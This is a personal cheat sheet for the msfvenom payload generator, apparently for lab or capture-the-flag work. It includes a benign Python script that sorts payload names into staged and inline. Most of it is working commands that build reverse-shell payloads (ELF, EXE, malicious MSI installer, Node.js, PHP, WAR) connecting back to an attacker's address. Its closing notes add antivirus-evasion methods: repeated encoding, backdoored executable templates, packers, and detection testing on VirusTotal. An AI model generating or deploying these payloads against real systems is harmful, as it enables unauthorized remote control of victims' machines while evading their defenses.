msfvenom
msfvenom is a tool of the Metasploit framework that generates payloads, for instance reverse shells. Payloads can be customized according to:
- the program executing the payload (PHP, Python...)
- the target operating system
- the presence and configuration of a firewall
- the presence and configuration of an antivirus
- ...
$ msfvenom --list payloads
$ msfvenom --list payloads | grep meterpreter
msfvenom is often used together with msfconsole, which catches the connection and pops a meterpreter shell (see Metasploit framework; in short, an upgraded shell).
Metasploit separates staged payloads from inline payloads. The former involve two steps: a small payload (called the stage or stager) is sent first, and it then requests the rest of the payload. They are mainly used when there is a restriction on the size of the payload.
In Metasploit, the `_` is replaced with a `/` for staged payloads:
- php/meterpreter_reverse_tcp: inline/single
- php/meterpreter/reverse_tcp: staged
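The naming rule above matters when reading a listener log or an IDS alert that names the payload: a staged name means a second network transfer (the stage download) follows the initial connect-back, a single name means it does not. The classifier below is an added example, not code from the original notes or from the Metasploit project. It applies the `_` versus `/` rule from the notes to a constructed listing; the set of stage names it recognizes is an assumption, not an official Metasploit list, and goes beyond the two PHP examples above to cover shell/meterpreter stages on any platform.

```python
"""Classify Metasploit payload names as staged or single (inline).

Added example, not part of the original notes or of the Metasploit project.
Rule from the notes: a staged payload names its stage and stager as separate
path components (php/meterpreter/reverse_tcp), while the single/inline
variant joins them with an underscore (php/meterpreter_reverse_tcp).
"""
from __future__ import annotations

# Assumed stage names (not an official list): the second-to-last path
# component of a staged payload is the stage, the last one is the stager.
STAGE_NAMES = {"meterpreter", "shell", "vncinject", "dllinject", "custom", "upexec"}

# Constructed sample resembling the name column of `msfvenom --list payloads`
# (the real output also carries a description column, which is ignored below).
SAMPLE_LISTING = """\
cmd/unix/reverse_netcat
linux/x64/shell_reverse_tcp
linux/x64/shell/reverse_tcp
php/meterpreter/reverse_tcp
php/meterpreter_reverse_tcp
php/reverse_php
windows/x64/meterpreter/reverse_tcp
windows/x64/shell_reverse_tcp
java/jsp_shell_reverse_tcp
"""


def is_staged(payload: str) -> bool:
    """True when the payload is a stager that fetches its stage after connecting."""
    parts = payload.strip().split("/")
    return len(parts) >= 2 and parts[-2] in STAGE_NAMES


def inline_variant(payload: str) -> str | None:
    """Name of the single (inline) payload corresponding to a staged one.

    Reverses the notes' rule (`/` between stage and stager becomes `_`).
    Returns None for payloads that are already single. Whether the inline
    variant really exists must still be checked with `msfvenom --list payloads`.
    """
    if not is_staged(payload):
        return None
    parts = payload.strip().split("/")
    return "/".join(parts[:-2] + [parts[-2] + "_" + parts[-1]])


def classify_listing(listing: str) -> dict[str, list[str]]:
    """Split a payload listing into staged and single names (blank lines skipped)."""
    result: dict[str, list[str]] = {"staged": [], "single": []}
    for line in listing.splitlines():
        fields = line.split()
        if not fields:
            continue
        name = fields[0]  # first column is the payload name
        result["staged" if is_staged(name) else "single"].append(name)
    return result


if __name__ == "__main__":
    for kind, names in classify_listing(SAMPLE_LISTING).items():
        print(f"{kind}:")
        for name in names:
            print(f"  {name}")
```

Feed it the real output of `msfvenom --list payloads` (piped through a file) to get the same split over the full list; the classifier only looks at the first whitespace-separated column of each line.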
Common options
-p to define the payload to use.
$ msfvenom -p cmd/unix/reverse_netcat [...]
LHOST/LPORT to define where the target will connect back.
$ msfvenom [...] LHOST=tun0 LPORT=4444
-f to define the format of the output. For instance, raw code.
$ msfvenom [...] -f raw
$ msfvenom [...] R # same for -f RAW
-e to define the encoding. It's mainly used to bypass a firewall or to reduce the size of the payload.
$ msfvenom [...] -e php/base64
Some payloads
All examples ask the target to connect back to the tun0 IP at port 4444.
- Linux (.elf / ...)
# execute /bin/bash -p
$ msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o shell.elf
# Generate a .elf opening a reverse shell (TCP)
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=tun0 LPORT=4444 -f elf -o shell.elf
# Output a command (RAW) opening a reverse shell with netcat
$ msfvenom -p cmd/unix/reverse_netcat LHOST=tun0 LPORT=4444 -f raw
- Windows (.exe / .msi / ...)
# Generate a .exe opening a reverse shell (TCP)
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o shell.exe
# Generate a malicious installer (msi)
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=4444 -f msi -o shell.msi
- Node.js
# Generate a .js opening a reverse shell (TCP)
$ msfvenom -p nodejs/shell_reverse_tcp LHOST=tun0 LPORT=4444 -o shell.js
- PHP
# very unstable shell, not recommended
$ msfvenom -p php/reverse_php LHOST=tun0 LPORT=4444 -o revshell.php
# meterpreter
$ msfvenom -p php/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -o revshell.php
- Tomcat
# works with Tomcat 7.8
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=4444 -f war -o revshell.war
To-do
Stuff that I found, but never read/used yet.
Payload encoding: make the payload compatible with different architectures and help with antivirus evasion.
- Shikata Ga Nai (SGN): good but still detected by modern antivirus.
-e x86/shikata_ga_nai
- Use iterations to make it harder to detect:
-i 10
- Password-protected archives are an additional antivirus evasion technique
- backdoored executable: use executable templates to hide the code
- Packers are also an alternative: polypack
Other options:
- -a x86: explicit architecture
- --platform windows: explicit platform
- -k: with a backdoored executable, the original executable still runs as it did. If started from a terminal, a new terminal will (still) pop.
- -x xxx.exe: executable template
- -o xxx.exe: output file
Test on VirusTotal: msf-virustotal -k <API key> -f xxx.exe